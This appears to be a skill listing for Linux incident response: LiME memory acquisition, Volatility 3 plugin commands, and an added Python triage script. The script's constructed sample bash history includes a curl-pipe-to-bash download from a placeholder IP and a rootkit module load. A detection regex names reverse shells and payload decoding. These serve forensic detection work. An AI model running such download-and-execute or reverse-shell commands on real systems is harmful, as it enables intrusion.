Extracts Linux memory using LiME kernel module and analyzes with Volatility 3 for processes, network connections, bash history, kernel modules, and injected code in incident response.
npx claudepluginhub killvxk/cybersecurity-skills-zh
This skill uses the workspace's default tool permissions.
Acquires Linux memory with the LiME kernel module, then extracts forensic artifacts from the image with Volatility 3.
Uses Volatility 3 to analyze RAM dumps for malware execution, process injection, network connections, and credential theft evidence. For incident response, DFIR, and memory forensics investigations.
# LiME memory acquisition. The module must be built against the exact running kernel
# (hence the $(uname -r) suffix); write the image to external media or a network target,
# never to the suspect host's own disk, and hash it (sha256sum) before analysis.
insmod lime-$(uname -r).ko "path=/evidence/memory.lime format=lime"
# Volatility 3 analysis (vol3 is the Volatility 3 CLI; pip installs it as `vol`).
# The linux.* plugins need an ISF symbol table for that exact kernel, generated with
# dwarf2json from the kernel's debug symbols and placed in the symbols/linux directory.
vol3 -f /evidence/memory.lime linux.pslist
vol3 -f /evidence/memory.lime linux.bash
vol3 -f /evidence/memory.lime linux.sockstat
from volatility3.framework import contexts, automagic, interfaces, plugins
from volatility3.plugins.linux import pslist
# Volatility 3 programmatic use: point the context at the image, let the automagic stack
# the layers and find the kernel's ISF symbol table, then run linux.pslist and collect rows.
context = contexts.Context()
context.config["automagic.LayerStacker.single_location"] = "file:///evidence/memory.lime"
automagics = automagic.choose_automagic(automagic.available(context), pslist.PsList)
plugin = plugins.construct_plugin(context, automagics, pslist.PsList, "plugins",
                                  None, interfaces.plugins.FileHandlerInterface)
rows = []  # one list of column values per process, the same rows the CLI would print
plugin.run().populate(lambda node, acc: acc.append(node.values) or acc, rows)
Key analysis steps:
# Full forensic workflow
vol3 -f memory.lime linux.pslist | grep -v "\[kthread\]"
vol3 -f memory.lime linux.bash
vol3 -f memory.lime linux.malfind
vol3 -f memory.lime linux.lsmod
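The workflow above leaves the analyst to read four plugin outputs by eye. The following is an added example (not part of this skill or of Volatility 3) that drives the same plugins through the CLI's JSON renderer (`vol3 -r json -f <image> <plugin>`) and applies three triage rules: suspicious recovered bash commands, kernel modules absent from a known-good baseline, and processes that carry a kernel-thread name but are not parented by kthreadd. The `SAMPLE_*` rows are constructed to mimic the renderer's output so the rules run offline; the column names used (`PID`, `PPID`, `COMM`, `Command`, `Name`), the `vol3` command name and the baseline module list are assumptions.

```python
#!/usr/bin/env python3
"""Triage helper for Volatility 3 Linux plugin output (added example, not project code).

Column names ("PID", "PPID", "COMM", "Command", "Name") are assumed from the json
renderer; the SAMPLE_* rows below are CONSTRUCTED so the rules can run offline.
"""
import json
import re
import subprocess
from typing import Dict, List

# Constructed sample rows, shaped like `vol3 -r json -f memory.lime linux.pslist/bash/lsmod`
SAMPLE_PSLIST = [
    {"PID": 1, "PPID": 0, "COMM": "systemd"},
    {"PID": 2, "PPID": 0, "COMM": "kthreadd"},
    {"PID": 15, "PPID": 2, "COMM": "kworker/0:1"},
    {"PID": 612, "PPID": 1, "COMM": "sshd"},
    {"PID": 4021, "PPID": 612, "COMM": "bash"},
    {"PID": 4100, "PPID": 4021, "COMM": "kworker/u8:3"},  # kernel-thread name, userland parent
]
SAMPLE_BASH = [
    {"PID": 4021, "Process": "bash", "CommandTime": "2024-01-01 10:00:00", "Command": "ls -la /var/log"},
    {"PID": 4021, "Process": "bash", "CommandTime": "2024-01-01 10:01:00", "Command": "curl http://203.0.113.5/x.sh | bash"},
    {"PID": 4021, "Process": "bash", "CommandTime": "2024-01-01 10:02:00", "Command": "insmod /tmp/rk.ko"},
]
SAMPLE_LSMOD = [
    {"Offset": "0xffffffffc0a1b000", "Name": "ext4", "Size": 794624},
    {"Offset": "0xffffffffc0b2c000", "Name": "xfs", "Size": 1515520},
    {"Offset": "0xffffffffc0c3d000", "Name": "rk", "Size": 16384},
]

# Download-and-execute, module loading, decoded payloads, reverse shells, staging in tmpfs
SUSPICIOUS_CMD = re.compile(
    r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\binsmod\b|\bbase64\s+-d\b|\bnc\b.*\s-e\s|\bchmod\s+\+x\s+/(tmp|dev/shm)/"
)
# Names the kernel gives its own threads
KTHREAD_NAME = re.compile(r"^(kthreadd|kworker/|ksoftirqd/|migration/|rcu_|kswapd)")


def run_plugin(image: str, plugin: str, vol: str = "vol3") -> List[Dict]:
    """Run one Volatility 3 plugin with the JSON renderer and return its rows."""
    proc = subprocess.run([vol, "-q", "-r", "json", "-f", image, plugin],
                          check=True, capture_output=True, text=True)
    return json.loads(proc.stdout)


def suspicious_commands(bash_rows: List[Dict]) -> List[Dict]:
    """linux.bash rows whose recovered command line matches a suspicious pattern."""
    return [r for r in bash_rows if SUSPICIOUS_CMD.search(r["Command"])]


def unexpected_modules(lsmod_rows: List[Dict], baseline: List[str]) -> List[str]:
    """linux.lsmod names absent from a baseline taken from a known-good host of the same build."""
    return sorted({r["Name"] for r in lsmod_rows} - set(baseline))


def masquerading_kernel_threads(pslist_rows: List[Dict]) -> List[Dict]:
    """Processes named like kernel threads but not parented by kthreadd (PID 2) or PID 0.

    Real kernel threads are children of kthreadd; a 'kworker' whose parent is a shell
    or daemon is a userland process hiding behind a kernel-thread name.
    """
    return [r for r in pslist_rows
            if KTHREAD_NAME.match(r["COMM"]) and r["PPID"] not in (0, 2)]


def triage(image: str, module_baseline: List[str], vol: str = "vol3") -> Dict[str, List]:
    """Run the three plugins against an image and return only the flagged rows."""
    return {
        "commands": suspicious_commands(run_plugin(image, "linux.bash", vol)),
        "modules": unexpected_modules(run_plugin(image, "linux.lsmod", vol), module_baseline),
        "fake_kthreads": masquerading_kernel_threads(run_plugin(image, "linux.pslist", vol)),
    }


if __name__ == "__main__":
    import sys
    # Usage: python3 triage.py /evidence/memory.lime   (baseline module list is an assumption)
    print(json.dumps(triage(sys.argv[1], ["ext4", "xfs"]), indent=2))
```

The module baseline should come from a clean host running the same kernel build, not from the suspect host; a rootkit that hides its module from `lsmod` on the live system will still appear in the memory image's module list, which is the point of comparing the two.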